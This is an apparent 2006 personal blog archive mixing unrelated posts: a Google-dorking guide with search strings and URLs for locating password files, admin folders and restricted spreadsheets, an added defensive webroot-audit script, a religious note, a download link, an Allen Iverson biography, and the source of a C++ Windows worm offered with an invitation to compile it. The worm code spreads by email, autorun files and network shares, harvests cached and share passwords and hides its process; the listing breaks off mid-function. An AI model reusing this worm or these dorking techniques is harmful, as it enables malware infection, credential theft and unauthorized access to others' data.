Friday, June 30, 2006

CATCH ME IF U CAN

Catch you people later, OK, after my test... I'm going to get my ass kicked on July 3rd:
exam in SQL database and connecting SQL with Visual Basic... hehe, that's really interesting... and a little sleepy too... luckily no theory paper this time...

Tuesday, June 27, 2006

Google: A Hacker's Best Friend

In the last few years a number of news articles appeared that warned of the fact that hackers (or
crackers if you will) make use of the google search engine to gain access to files they shouldn't be
allowed to see or have access to. This knowledge is nothing new to some people but personally I have
always wondered how exactly a thing like this works. VNUnet’s James Middleton wrote an article in
2001 talking about hackers using a special search string on google to find sensitive banking data:
"One such posting on a security newsgroup claimed that searching using the string 'Index of /
+banques +filetype:xls' eventually turned up sensitive Excel spreadsheets from French banks. The
same technique could also be used to find password files"[1]
Another article that appeared on wired.com told us how Adrian Lamo, a hacker who made the news
often the last couple of years, explained that google could be used to gain access to websites of big
corporations.
“For example, typing the phrase "Select a database to view" -- a common phrase in the FileMaker Pro
database interface -- into Google recently yielded about 200 links, almost all of which led to FileMaker
databases accessible online.”[2]
These articles kept on coming up in the online news. U.S. Military and Government websites were
vulnerable because admin scripts could be found using google, medical files, personal records,
everything suddenly seemed just one google search away. But these articles seemed to show up once
every half year and always talked about it as if it was something new. Another thing was, the articles
never explained how one would actually go about doing this. Almost never an example of a search
string was given. The last time I read one of these articles I decided it was time to find out for myself,
whether google actually could do all they say it can. The following is a report of my findings and a
description of some techniques and search strings one could use.

Theory

The theory behind this is actually quite simple. Either you think of certain data you would like to
acquire and try and imagine in what files this kind of data could be stored and you search for these
files directly. (Search for *.xls files for example) Or you take the more interesting approach and you try
to think of a certain software that allows you to perform certain tasks or to access certain things and
you search for critical files of this software. An example could be a content management system. You
read up on this particular content management system, check which files it consists of and search for
those. A great example is that of the databases mentioned above, where you know the string “view
database” is used on pages that shouldn’t be accessible to you and you then search for pages
containing that string, or you check the software and notice that the option to view a database is linked
on a webpage within this software called “viewdbase.htm” and you search for “viewdbase.htm”.
The most important thing is to have a clear goal, to know what it is you want to find. Then search for
these specific files or trademarks that these files have.

Google Search Options

Specific file types: *.xls, *.doc, *.pdf, *.ps, *.ppt, *.rtf

Google allows you to search for specific file types, so instead of getting html-files as a result (websites)
you get Microsoft excel files for example. The search string you would use would be this:
Filetype:xls (for excel files) or filetype:doc for word files.
But maybe more interesting would be searching for *.db files and *.mdb files. Google by the way
doesn’t tell you you can search for *.db and *.mdb files. I wonder what other file types one can search
for. Things that come to mind are *.cfg files or *.pwd files, *.dat files, stuff like that. Try and think of
something that might get you some interesting results.

Inurl

Another useful search option is the inurl: option which allows one to search for a certain word one
would want to be in the url. This gives you the opportunity to search for specific directories/folders,
especially in combination with the “index of” option, about which I will talk later on.
An example would be inurl:admin which would give you results of website urls that have the word
“admin” in the url.

Index of

The index of option is another option that isn’t especially thought of by the creators of google, but
comes in very handy. If you use the “index of” string you will find directory listings of specific folders on
servers. An example could be:
"index of" admin or index.of.admin
which would get you many directory listings of admin folders. (don’t forget to use the quotes in this
case since you are looking for the entire “index of” string, not just for “index” and “of”)

Site

The site option allows you to come up with results that only belong to a certain domain name
extension or to a specific site. For example one could search for .com sites or .box.sk sites or .nl sites,
but also for results from just one site, but more interesting might be to search for specific military or
government websites. An example of a search string would be:
Site:mil or site:gov
Site:neworder.box.sk “board”

Intitle

Intitle is another nice option. It allows you to search for html files that have a certain word or words in
the title. The format would be intitle:wordhere. You could check out what words appear in the title of
some online control panel or content management system and then search google for this word with
the intitle option, to find these control panel pages.

Link

The Link option allows you to check which sites link to a specific site. As described in Hacking
Exposed Third Edition, this could be useful:
“These search engines provide a handy facility that allows you to search for all sites that have links
back to the target organization’s domain. This may not seem significant at first but let’s explore the
implications. Suppose someone in an organization decides to put up a rogue website at home or on
the target network’s site.”[4]

Combining search options

The above mentioned search options might or might not be known to you, but even though they can
amount to some interesting results, it’s a fact that when you start combining them, that’s when
google’s magic starts to show. For example, one could try this search string:
inurl:nasa.gov filetype:xls "restricted" or this one: site:mil filetype:xls "password" or maybe
site:mil “index of” admin
(I’m just producing these from the top of my head, I don’t know whether they’d result in anything
interesting, that’s where you come in. You got to find a search string that gets the results you want.)

Examples; The Good Stuff

Specific file types: *.xls, *.doc, *.pdf, *.ps, *.ppt, *.rtf

To start out simple, you can try and search directly for files that you believe might hold interesting
information. The obvious choices for me were things like:
Password, passwords, pwd, account, accounts, userid, uid, login, logins, secret, secrets, all followed
by either *.doc or *.xls or *.db
This led me to quite some interesting results, especially with the *.db option but I actually also found
some passwords.doc files, containing working passwords.

http://www.doc.state.ok.us/Spreadsheets/private%20prison%20survey%20for%20web.xls
http://www.bmo.com/investorrelations/current/current/suppnew/private.xls
http://www.nescaum.org/Greenhouse/Private/Participant_List.xls
http://www.dscr.dla.mil/aviationinvest/attendance_5Apr01.xls
http://web.nps.navy.mil/~drdolk/is3301/PART_IS3301.XLS

enjoy it.........
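
The same search strings can be turned around for defence. The following is an added example, not part of the original post: it walks your own web document root and flags what the queries above would surface, using the file types and file-name words listed in the article. The function names, the index file names and the sample tree are assumptions made for the example, and the "listing-risk" finding assumes the web server has automatic directory indexing switched on.

```python
import os
import re
import tempfile

# File types the article names as searchable (filetype:xls, *.db, *.mdb, ...).
DOC_EXTENSIONS = {".xls", ".doc", ".pdf", ".ps", ".ppt", ".rtf"}
DATA_EXTENSIONS = {".db", ".mdb", ".cfg", ".pwd", ".dat"}

# Words the article searched for in file names, plus "admin" and "restricted"
# from its inurl: and combined-search examples.
RISKY_WORDS = {
    "password", "passwords", "pwd", "account", "accounts", "userid", "uid",
    "login", "logins", "secret", "secrets", "admin", "restricted",
}

# Assumption: names your server treats as a directory index. A directory
# without one of these is served as an "Index of" page when autoindex is on.
INDEX_FILES = {"index.html", "index.htm", "index.php", "default.htm"}


def path_tokens(rel_path):
    """Split a path into lowercase words so 'uid' does not match 'guide'."""
    return {t for t in re.split(r"[^a-z0-9]+", rel_path.lower()) if t}


def audit_webroot(root):
    """Return (finding, relative_path) tuples for everything worth a look.

    listing-risk   : directory with no index file (candidate "Index of" page)
    data-file      : database/config/password file types under the web root
    sensitive-name : office document whose path contains a risky word
    """
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()  # deterministic traversal order
        rel_dir = os.path.relpath(dirpath, root).replace(os.sep, "/")
        if not INDEX_FILES & {f.lower() for f in filenames}:
            findings.append(("listing-risk", rel_dir))
        for name in sorted(filenames):
            rel = name if rel_dir == "." else rel_dir + "/" + name
            ext = os.path.splitext(name)[1].lower()
            if ext in DATA_EXTENSIONS:
                findings.append(("data-file", rel))
            elif ext in DOC_EXTENSIONS and path_tokens(rel) & RISKY_WORDS:
                findings.append(("sensitive-name", rel))
    return findings


def build_sample_tree(root):
    """Create a small constructed web root to run the audit against."""
    sample_files = [
        "index.html",
        "docs/guide.pdf",
        "admin/index.php",
        "admin/passwords.doc",
        "backup/users.mdb",
    ]
    for rel in sample_files:
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write("constructed sample\n")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for kind, path in audit_webroot(tmp):
            print(f"{kind:15} {path}")
```

Anything reported should be moved out of the document root, put behind authentication, or have directory indexing disabled for its folder; a robots.txt entry alone only asks crawlers not to index it.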

Monday, June 26, 2006

SOME THINGS THAT U MUST NOT SAY

To all of the Muslims out there who read my blog: there are things that you say unknowingly. You are not supposed to say "mosque"; instead say "masjid". I have found that "mosque" means "mosquitos", and please don't write "mecca", it means "house of wines", so please write it correctly as "Makkah". And don't write the name of our prophet (slw) in short form as "Mohd", it means "the dog with big mouth", so write it completely as "Mohamed". I hope all of the people will watch their mouths.......heheh...

Saturday, June 24, 2006

E-directory

Jaa has built an e-directory program for Pocket PCs. This is very good work, and all I want is the e-directory, so here it is... this was a comment on my blog that diabolicaldevil posted... I want others to see this too... NO OFFENCE to anyone, especially Dhiraagu people...

d0wnload it and work it out.....

http://jaa.technova.com.mv/uploads/Pocket110-1.0b2-PPC.cab

It's a phone directory for Pocket PCs.
If you want to search for the house name,
just extract the .cab file using WinRAR and open the DIRECT~1.001 file in WordPad.

THERE IS A WALL PAPER OF A IVERSON

Allen Iverson biography

Since I'm a basketball player... I know from 2003, and he has done the best crossovers ever in the NBA... read the rest below...

It was 1975 and Ann Iverson was 15 years old, unmarried and newly arrived with her family from Connecticut when she gave birth in Hampton to her first child. Allen Iverson was nicknamed Bubbachuck, a combination of two uncles’ names. Iverson said his biological father rarely was in the picture during his childhood. "You know, he called me a little bit this year (1996)," Iverson said. "But, I mean, he can’t take the place of Michael Freeman. Nobody ever will. That’s who I feel is my father." Freeman said he was 18 and Bubbachuck just a few months old when he and Ann Iverson began living together in 1975. Freeman said he later became a welder for the Newport News Shipbuilding and Dry Dock Co., and the father of Allen’s sisters, Brandy and Iiesha. Ann Iverson held various jobs after graduating from high school - one on an assembly line at Avon Fashions, a clothes packaging and distribution factory where she worked from 4 p.m. to 4 a.m. At times she was unemployed. But Allen Iverson said he never has forgotten his mother’s efforts. "She took care of me for 20 years," he said. "I want to just do the same thing for her." Freeman said he and Ann Iverson began living apart when Allen was in junior high school. Freeman said he helped support the family until he lost his job after a car accident. "Then things got tough," he said. "There were times when Allen never knew where his next meal was going to be," said Mike Bailey, Iverson’s basketball coach at Bethel High. "Here’s a kid who couldn’t take a bath because he had no running water because it had been turned off. Sometimes you had to go to five, six different places to find him," Bailey said. "You couldn’t phone some places because there were no phones." "My mom struggled. My dad struggled. Everybody in my family struggled," Iverson said recently. "It was nothing new, the lights being cut off or anything. I mean, it was something I had been dealing with my whole life."

Unemployed, Freeman said he "went the wrong way. I did what I had to do" to support the family. "And some things, you know, I had to go against the law to do." In February 1991, midway through Iverson’s ninth grade year, Freeman was convicted in Newport News, Va., of possession of cocaine with intent to distribute and given a 10 year prison sentence with five years suspended. "When I left my son to go to prison I told him he’s got to hold down the fort until I got home," Freeman said. Iverson was 15. "I said, basketball is your family’s way out." Freeman was paroled in December 1992. But he was arrested in Hampton in March 1994 on charges of possession of cocaine with intent to distribute and possession of a firearm. He was indicted for possession of cocaine; he pleaded guilty and was given a suspended sentence. In November 1994, the suspended sentence he received in 1991 was revoked and he was returned to prison. Freeman was paroled again in January. "I feel all the jail time he did was for us," Iverson said. "He couldn’t stand to look at us living like that. So he went out and did what he had to do."

High school

While Iverson was leading Bethel to state football and basketball titles during his junior year, his coaches became increasingly concerned about the company and late night hours he was keeping. One night in January 1993, Iverson was at a party in a hotel where a man was shot to death. On Valentine’s Day in 1993, Iverson and friends were involved in a gang fight at a Hampton, Virginia, bowling alley. Iverson’s crowd was loud and had to be asked to quiet down several times, and eventually something of a shouting duel began with another group of youths. A huge fight erupted, pitting the local white kids against the blacks. It started as an argument between Iverson and a white youth. Iverson insists he left when trouble started. Another witness claimed to have seen him hit a white woman in the head with a chair. Iverson was tried as an adult, and the trial became a media circus. Iverson and three blacks were the only ones arrested and his celebrity bore on the case. Iverson was convicted of maiming by mob, and sentenced to five years in prison. Ann Iverson, meanwhile, began optimistically mapping out her 18-year-old son’s future. On Oct. 10, 1993 she visited Allen in prison, where he signed an affidavit giving her power of attorney. "My name is Allen Iverson," the affidavit read. "I am in need for my mother to conduct any and all of my affairs and make any and all decisions for me." One of Ann Iverson’s decisions was to visit Thompson in early December 1993. "She was the reason why I helped her child," Thompson said. Several weeks later, Virginia’s governor at the time, L. Douglas Wilder, granted conditional clemency to Iverson, citing sufficient doubt about his guilt. Iverson was free after four months at the City Farm. In spring 1994, Thompson visited Iverson at Hampton’s Richard M. Milburn High, which caters to students who have dropped out of school or are at risk of doing so.
"I never discussed that bowling alley incident, never asked him, ‘What really happened?’" Thompson said. "I told him I did not want to talk about whether the judge was fair or not."


College

At Georgetown, Iverson majored in fine arts. Iverson said he has an interest in drawing, and friends say he is an outstanding caricaturist. "I want to continue to draw," Iverson said. "Every talent God gave me, I want to use it. I can’t play basketball forever." But his primary mission at Georgetown seemed to be improving his basketball skills. Recalling his first day on campus, Iverson said, "Alonzo Mourning (an NBA star and ex-Hoya) was in the gym talking to Coach Thompson. I mean, I was excited even before I got to Georgetown. But once I got there I was even more excited. All I wanted to do was play basketball." During his two seasons with the Hoyas, Iverson averaged 23 points a game and twice was named Big East Conference defensive player of the year. From his first game, the 6 foot, 165 pound Iverson was an electrifying presence on the court. He had astonishing speed while dribbling and explosive jumping ability. Thompson allowed and sometimes even asked Iverson to dominate games as few Georgetown guards have. Some Thompson watchers were surprised by the offensive freedom he gave Iverson. "You teach according to the student," Thompson explained. "Allen had talent - exceptional talent. So he was permitted to have more leeway. You don’t crush creativity."

Deciding to Leave

Evidently, Iverson also had a knack for blocking out distractions, which seemed to be everywhere. At some games, he was taunted by opposing fans who yelled "jailbird, jailbird" or waved bowling pins in the air. In the midst of his freshman season, Ann Iverson used her power of attorney to file suit - in Allen’s name - against the lawyer who had defended him free of charge in the bowling alley case, Herbert V. Kelley Sr. The lawsuit alleged that Kelley had been negligent and that Iverson would suffer "mortification, shame, vilification and financial loss" because of the guilty verdict. The complaint sought $100 million in damages. Then there was Freeman’s incarceration.
While Iverson was settling into his comfortable dormitory suite at Copley Hall to begin his sophomore year last fall, his "dad" was living just a few miles away at the Fairfax County Correctional Field Unit, one of several state facilities in which he was housed. Iverson said he didn’t visit Freeman in Fairfax because "I’d visited him in another prison and it just hurt me so much. I’d given him the tennis shoes off my feet because the sneakers he had, they were so bad, all messed up. So I went home barefooted that day." As the season progressed, and reporters began wondering if Bubbachuck would become the first Georgetown player to enter the NBA draft before his senior year, Thompson became increasingly aware of the hardships in Iverson’s life. In early April, shortly after the Hoyas were eliminated from the NCAA tournament, Thompson invited Iverson and his mother to a meeting at McDonough. The subject: should Iverson leave school to turn pro? Two of Thompson’s most trusted confidants - Falk, his Washington based agent, and Mary Fenlon, his long-time aide-de-camp - also were invited. Falk has provided free counsel to Thompson’s athletes for more than 15 years and has represented virtually every Hoya who has played in the NBA, including Mourning, Patrick Ewing and Dikembe Mutombo. "John makes no bones of the fact he recommends us to his players," said Falk, who also represents Michael Jordan, Iverson’s childhood hero. Falk said he "very, very aggressively" advised Iverson to stay in school because he could earn more money, particularly from endorsement contracts, after another year of TV exposure. But in that meeting and in another in his office on upper Wisconsin Avenue, Falk said he heard some compelling reasons why Iverson should turn pro. "Allen told me his mother’s living conditions were deplorable," Falk said. "There was a sewage problem in her house. Sewage was seeping through the floor and Allen said there was a stench that was just unimaginable."
The condition of younger sister Iiesha also had worsened; she had just suffered another seizure. "His sister needed a brain specialist," Falk said. Meanwhile, Freeman had been paroled and was unemployed. "Allen didn’t feel that staying in school was a viable option," Falk said. Thompson said outside influences also were competing for Iverson’s attention this spring. Agents were on the prowl, and "you had people running around trying to get him involved in rapping," Thompson said. Iverson had spent some evenings in a studio, recording a rap song, which he played for teammates. Thompson said he told Iverson, "You are a basketball player. You’re not going to make your living rapping." As for the agents, Falk was the odds-on favorite to represent Iverson. Shortly after Georgetown’s season ended, Falk arranged for Iverson to have a private phone conversation with his childhood hero. "Michael told me he had heard a lot of good things about me," Iverson said, "and he said he was going to have to tighten up his game for me. Which was definitely a joke. I just laughed. But everything he said to me made me feel good." On April 30, Iverson signed a contract with Falk. The next afternoon, with his mother, Thompson and Falk by his side, Iverson announced he was turning pro. A Georgetown official said Iverson withdrew from the university the same day. With two months to go before the draft, Iverson asked a bank for a line of credit, which was granted on the basis of his seven figure earning potential. Iverson then hired a specialist for Iiesha and discussed with Falk the possibility of moving his entire family to the NBA city where he soon will reside.

Localhost

Today I was wondering about the localhost that I see in the PHP webserver, so I went to Start - Run - cmd; the command was ping localhost

Pinging geek-f69dd6592 [127.0.0.1] with 32 bytes of data:

Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128

Packets: Sent = 4, Received = 4, Lost = 0
Minimum = 0ms, Maximum = 0ms, Average = 0ms

http://www.totalillusions.net/forum/index.php?showtopic=328

WORM.CPP

//I came across a cool c++ code i also have done changers to this code so try to compile it see what happen ............

// An exploration into remote network propogation using multiple techniques.

// The w0rm will spread via e-mail (MAPI) all local drives and any writable

// network shares. It collects passwords on the local system to be used in

// cracking any password protected shares on the network. It will write an

// Autorun.inf file in the root of any drives it can so when you open that

// drive, e.g. double click it the w0rm will execute and go resident :).

// This code is obviously buggy and not intended to be actually used in the

// 'real' world. To determine if the payload should be deployed the w0rm

// sits on the network and plays a 'game' with other w0rms on that network

// segment via broadcast UDP messages. see relevant source for a proper

// idea of the 'game', its just a perverse example of too much time on ones

// hands :). this is version 1.00 so the are bugs, incompatabilities with

// various flavors of windows and other anomolies - dose! but if you want

// something better write it yourself ;) (and send me a copy)

//--header-files--------------------------------------------------------------//

#include

#include

#include

#include

#include

#include

//--defines-------------------------------------------------------------------//

#define MAX_LENGTH 128

#define MAX_RECIEVERS 50

#define MUTEX_NAME "w0rm"

#define EARTH_WORM_JIM "Readme.exe"

#define WORMGAME_PORT 12345

#define WORMGAME_MAX_WINS 10

#define WORMGAME_PKT_PLAY 0xFF

#define WORMGAME_PKT_WIN 0x80

//--globals-------------------------------------------------------------------//

char *ptrEgo, *buf;

char addressList[MAX_RECIEVERS][MAX_LENGTH], passwordList[50][MAX_LENGTH];

int index = 0;

typedef struct tagPASSWORD_CACHE_ENTRY {

WORD cbEntry;

WORD cbResource;

WORD cbPassword;

BYTE iEntry;

BYTE nType;

BYTE abResource[1];

} PASSWORD_CACHE_ENTRY;

typedef struct WormGamePkt {

BYTE pktType;

int pktNum;

} AWORMGAMEPACKET;

//--function-declarations-----------------------------------------------------//

DWORD WINAPI WormGameThread( LPVOID );

DWORD WINAPI WormMainThread( LPVOID );

BOOL runningNT();

void propogateMAPI( void );

int initMAPI( void );

int validAddress( char * addr );

int sendMessage( int recipNum, LHANDLE lhSession );

int getSharePasswords( void );

int getCachedPasswords( void );

int addPassword( char * pwd );

void propogateDrive( void );

void attackDrive( char * drive, int type );

void propogateNet( LPNETRESOURCE lpnr );

int crackNetShare( char * share );

void releasePayload();

extern "C" int __stdcall RegisterServiceProcess( int dwProcessID, int dwType );

//--entry-point---------------------------------------------------------------//

// WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int)

int main( int argc, char **argv )

{

HANDLE hMutex, hEgo, hWormGameThread, hWormMainThread;

DWORD WormGameThreadId, WormMainThreadId;

// display explorer window if we need to, due to autorun.inf file :)

// test for any command line...

/* only allow one instance of worm to run on system at one time */

hMutex = CreateMutex( NULL, TRUE, MUTEX_NAME);

if( GetLastError() == ERROR_ALREADY_EXISTS )

{

ExitProcess( 0 );

}

ptrEgo = argv[0];

/* try to 'hide' the process */

if( runningNT() == TRUE )

{

// hide process in winNT

printf("WORM running on WinNT\n");

} else {

printf("WORM running on Win9x\n");

LoadLibrary( "KERNAL32.DLL" );

RegisterServiceProcess( NULL, 1);

}

/* go resident and give worm RAW power */

hEgo = GetCurrentProcess();

SetPriorityClass( hEgo, HIGH_PRIORITY_CLASS);

// create suspended WormMainThread...

hWormMainThread = CreateThread( NULL, 0, WormMainThread, 0, CREATE_SUSPENDED, &WormMainThreadId);

if( hWormMainThread != NULL )

{

// set thread to time critical... 'i wana take you higher' - sly and the family stone

//SetThreadPriority( hWormMainThread, THREAD_PRIORITY_TIME_CRITICAL);

// resume thread execution...

ResumeThread( hWormMainThread );

}

/*

// create suspended WormGameThread...

hWormGameThread = CreateThread( NULL, 0, WormGameThread, 0, CREATE_SUSPENDED, &WormGameThreadId);

if( hWormGameThread != NULL )

{

// resume thread execution...

ResumeThread( hWormGameThread );

}

*/

/* wait for hWormGameThread() to terminate */

// WaitForSingleObject( hWormGameThread, INFINITE);

WaitForSingleObject( hWormMainThread, INFINITE);

printf("MAIN_DEBUG: worm threads ended, im outa here: press a key...\n");

getch();

/* release our mutex, next local worm wont get blocked */

if( hMutex != NULL )

{

ReleaseMutex( hMutex );

}

return 0;

}

//----------------------------------------------------------------------------//

DWORD WINAPI WormMainThread( LPVOID )

{

DWORD dwSize;

char buff[64];

printf("WormMainThread: started...\n");

/* spread worm via MAPI */

propogateMAPI();

/* get any passwords we can for use later on */

getSharePasswords();

getCachedPasswords();

dwSize = 64;

WNetGetUser( NULL, buff, &dwSize );

addPassword( buff );

printf("DEBUG: total pwds got = %d\n", index);

/* spread worm via any/all localy maped drives */

propogateDrive();

/* spread worm via any/all LAN network shares */

propogateNet( NULL );

/* finished our little game :) */

ExitThread( 0 );

return 0;

}

//----------------------------------------------------------------------------//

DWORD WINAPI WormGameThread( LPVOID )

{

WSADATA w;

SOCKET s_recv, s_send;

sockaddr_in saddr, saddr_in, saddr_out;

int size = sizeof( struct sockaddr ), totalwins = 0, magicWorm = 0, optval;

AWORMGAMEPACKET gamePkt;

fd_set fd_read;

struct timeval timeout = { 5, 0 };

if( WSAStartup( MAKEWORD(1,0), &w) != 0 )

{

printf("WormThread: WSAStartup failed\n");

goto endThread;

}

s_recv = socket( AF_INET, SOCK_DGRAM, IPPROTO_UDP);

s_send = socket( AF_INET, SOCK_DGRAM, IPPROTO_UDP);

if( s_recv == INVALID_SOCKET || s_send == INVALID_SOCKET )

{

printf("WormThread: invalid socket\n");

goto endThread;

}

memset( &saddr_in, 0x00, sizeof( struct sockaddr));

memset( &saddr, 0x00, sizeof( struct sockaddr));

saddr.sin_family = AF_INET;

saddr.sin_port = htons( WORMGAME_PORT );

saddr.sin_addr.s_addr = INADDR_ANY;

memset( &saddr_out, 0x00, sizeof( struct sockaddr) );

saddr_out.sin_family = AF_INET;

saddr_out.sin_port = htons( WORMGAME_PORT );

saddr_out.sin_addr.s_addr = INADDR_BROADCAST;

optval = 1;

if( setsockopt( s_send, SOL_SOCKET, SO_BROADCAST , (char*)&optval, sizeof( int) ) == SOCKET_ERROR )

{

printf("WormThread: setsocketopt failed\n");

goto endThread;

}

if( bind( s_recv, (struct sockaddr*)&saddr, sizeof( struct sockaddr)) == SOCKET_ERROR )

{

printf("WormThread: bind failed\n");

goto endThread;

}

FD_ZERO( &fd_read );

FD_SET( s_recv, &fd_read );

randomize();

loop:

while( 1 )

{

if( totalwins >= WORMGAME_MAX_WINS )

{

releasePayload();

totalwins = 0;

}

// pick a magic number...

magicWorm = ( ( rand() % 100 ) + 1 );

printf("WormThread: picked a magic num: %d\n", magicWorm);

// wait a length of time...

Sleep( 500 );

// send my magic number...

gamePkt.pktType = WORMGAME_PKT_PLAY;

gamePkt.pktNum = magicWorm;

if( sendto( s_send, (const char*)&gamePkt, sizeof( struct WormGamePkt ), 0, (struct sockaddr*)&saddr_out, size) == SOCKET_ERROR )

{

printf("WormThread: sendto failed\n");

break;

}

// handel responces...

while( select( 0, &fd_read, NULL, NULL, &timeout) != SOCKET_ERROR )

{

if( recvfrom( s_recv, (char*)&gamePkt, sizeof( struct WormGamePkt ), 0, (struct sockaddr*)&saddr_in, &size) == SOCKET_ERROR )

{

printf("WormThread: recvfrom failed\n");

break;

} else {

switch( gamePkt.pktType )

{

case WORMGAME_PKT_PLAY: // recieved a magic number...

// ignore responce from local machine...

printf("WormThread: recieved a magic num: %d\n", gamePkt.pktNum);

// process other responces

if( gamePkt.pktNum == magicWorm )

{

// notify any winners

gamePkt.pktType = WORMGAME_PKT_WIN;

saddr_out.sin_addr.s_addr = saddr_in.sin_addr.s_addr;

sendto( s_send, (const char*)&gamePkt, sizeof( struct WormGamePkt ), 0, (struct sockaddr*)&saddr_out, size);

saddr_out.sin_addr.s_addr = INADDR_BROADCAST;

}

break;

case WORMGAME_PKT_WIN: // im a winner :)

printf("WormThread: IM A WINNER!!!\n");

totalwins++;

goto loop;

default: // its all gone bugfuck!

printf("WormThread: its all gone bugfuck!\n");

break;

}

}

} // while(select...

}

endThread:

closesocket( s_recv );

closesocket( s_send );

ExitThread( 0 );

return 0;

}

//----------------------------------------------------------------------------//

BOOL runningNT()

{

OSVERSIONINFO osvi;

BOOL retval = FALSE;

osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);

GetVersionEx(&osvi);

switch( osvi.dwPlatformId )

{

case VER_PLATFORM_WIN32_NT:

retval = TRUE;

break;

case VER_PLATFORM_WIN32_WINDOWS:

retval = FALSE;

break;

default: // VER_PLATFORM_LINUX ? :) || VER_PLATFORM_WIN32_ANOTHERBUGGYRELEASE

retval = FALSE;

break;

}

return retval;

}

//----------------------------------------------------------------------------//

void propogateMAPI( void )

{

LHANDLE lhSession;

CHAR rgchMsgID[513];

MapiMessage *lpMessage;

int i=0;

if( initMAPI() != 0 )

{

return;

}

if( MAPILogon( 0, NULL, NULL, 0, 0, &lhSession) == SUCCESS_SUCCESS)

{

*rgchMsgID = NULL;

while( i <>

{

if( MAPIFindNext( lhSession, 0L, NULL, rgchMsgID, MAPI_LONG_MSGID, 0L, rgchMsgID) != SUCCESS_SUCCESS)

{

break;

}

if( MAPIReadMail( lhSession, 0L, rgchMsgID, MAPI_PEEK, 0L, &lpMessage) == SUCCESS_SUCCESS)

{

// printf("DOING: %s\n\t%s\n",lpMessage->lpOriginator->lpszAddress,lpMessage->lpRecips->lpszAddress);

if( validAddress( lpMessage->lpOriginator->lpszAddress ) == 0 )

{

strcpy( addressList[i], lpMessage->lpOriginator->lpszAddress);

i++;

}

if( validAddress( lpMessage->lpRecips->lpszAddress ) == 0 )

{

strcpy( addressList[i], lpMessage->lpRecips->lpszAddress);

i++;

}

}

}

MAPIFreeBuffer( lpMessage );

// TO DO: sort addressList and remove duplicates...

//sendMessage( i, lhSession ); // <---- !!!!!!

MAPILogoff( lhSession, 0L, 0L, 0L);

}

for( int x = 0 ; x <>

{

printf("DEBUG: attacking:\t%s\n", addressList[x]);

}

return;

}

//----------------------------------------------------------------------------//

int initMAPI( void )

{

HINSTANCE hi;

LPMAPILOGON MAPILogon;

LPMAPIFINDNEXT MAPIFindNext;

LPMAPIREADMAIL MAPIReadMail;

LPMAPISENDMAIL MAPISendMail;

hi = LoadLibrary( "mapi32.dll" );

if( hi == NULL )

{

return -1;

}

MAPILogon = (LPMAPILOGON)GetProcAddress( hi, "MAPILogon");

MAPIFindNext = (LPMAPIFINDNEXT)GetProcAddress( hi, "MAPIFindNext");

MAPIReadMail = (LPMAPIREADMAIL)GetProcAddress( hi, "MAPIReadMail");

MAPISendMail = (LPMAPISENDMAIL)GetProcAddress( hi, "MAPISendMail");

if( MAPILogon == NULL || MAPIFindNext == NULL || MAPIReadMail == NULL || MAPISendMail == NULL )

{

return -1;

}

return 0;

}

//----------------------------------------------------------------------------//

int validAddress( char * addr )

{

if( strlen( addr ) >= MAX_LENGTH || strlen( addr ) == 0)

{

return -1;

} else if( strchr( addr , '@') == NULL )

{

return -1;

} else if( strchr( addr , '.') == NULL )

{

return -1;

} else {

return 0;

}

}

//----------------------------------------------------------------------------//

int sendMessage( int recipNum, LHANDLE lhSession )

{

MapiRecipDesc *recips = (MapiRecipDesc *)malloc( recipNum*sizeof(MapiRecipDesc) );

MapiFileDesc attachment = { 0, 0, (ULONG)-1, ptrEgo, EARTH_WORM_JIM, NULL};

for( int i=0 ; i

{

recips[i].ulReserved = 0;

recips[i].ulRecipClass = MAPI_TO;

recips[i].lpszName = addressList[i];

recips[i].lpszAddress = addressList[i];

recips[i].ulEIDSize = 0;

recips[i].lpEntryID = NULL;

}

MapiMessage note = { 0, "The Subjext", "The Message Text", NULL, NULL, NULL, 0, NULL, recipNum, recips, 1, &attachment};

if( MAPISendMail( lhSession, 0L, ¬e, 0L, 0L) != SUCCESS_SUCCESS )

{

return -1;

}

free( recips );

return 0;

}

//----------------------------------------------------------------------------//

int CALLBACK pce(PASSWORD_CACHE_ENTRY *x, DWORD)

{

memmove(buf, x->abResource+x->cbResource, x->cbPassword);

buf[x->cbPassword] = 0;

addPassword( buf );

return 0;

}

//----------------------------------------------------------------------------//

int getCachedPasswords( void )

{

buf = new char[1024];

HINSTANCE hi = LoadLibrary("mpr.dll");

if( hi == NULL )

{

return -1;

}

WORD (__stdcall *enp)(LPSTR, WORD, BYTE, void*, DWORD) = (WORD (__stdcall *)(LPSTR, WORD, BYTE, void*, DWORD))GetProcAddress(hi, "WNetEnumCachedPasswords");

if( enp == NULL )

{

return -1;

}

enp( 0, 0, 0xff, pce, 0);

FreeLibrary( hi );

return 0;

}

//----------------------------------------------------------------------------//

BYTE rotr( BYTE b )

{

BYTE carry;

carry = b & 0x01;

carry <<= 7;

b >>= 1;

b |= carry;

return b;

}

//----------------------------------------------------------------------------//

void decodePW( char * pw )

{

BYTE hash = 0x35;

while( pw && *pw )

{

*pw = *pw ^ hash;

pw++;

hash = rotr( hash );

}

}

//----------------------------------------------------------------------------//

int addPassword( char * pwd )

{

if( (strlen(pwd) > 0) && (strlen(pwd) <>

{

strcpy( passwordList[ index ], pwd);

printf("DEBUG: ADDED: %s\n", passwordList[ index ]);

index++;

}

return 0;

}

//----------------------------------------------------------------------------//

int getSharePasswords( void ){

if( runningNT() == FALSE )

{

HKEY key, subkey;

DWORD i, maxKeys, len, junk;

char keyName[256], wrightPwd[256], readPwd[256];

RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan", 0, NULL, &key);

RegQueryInfoKey (key, NULL, NULL, NULL, &maxKeys, NULL, NULL,NULL, NULL, NULL, NULL, NULL);

if( maxKeys != 0 )

{

for( i=0; i

{

RegEnumKey(key, i, keyName, 256);

RegOpenKeyEx(key, keyName, 0, NULL, &subkey);

wrightPwd[0] = readPwd[0] = 0;

len = 256;

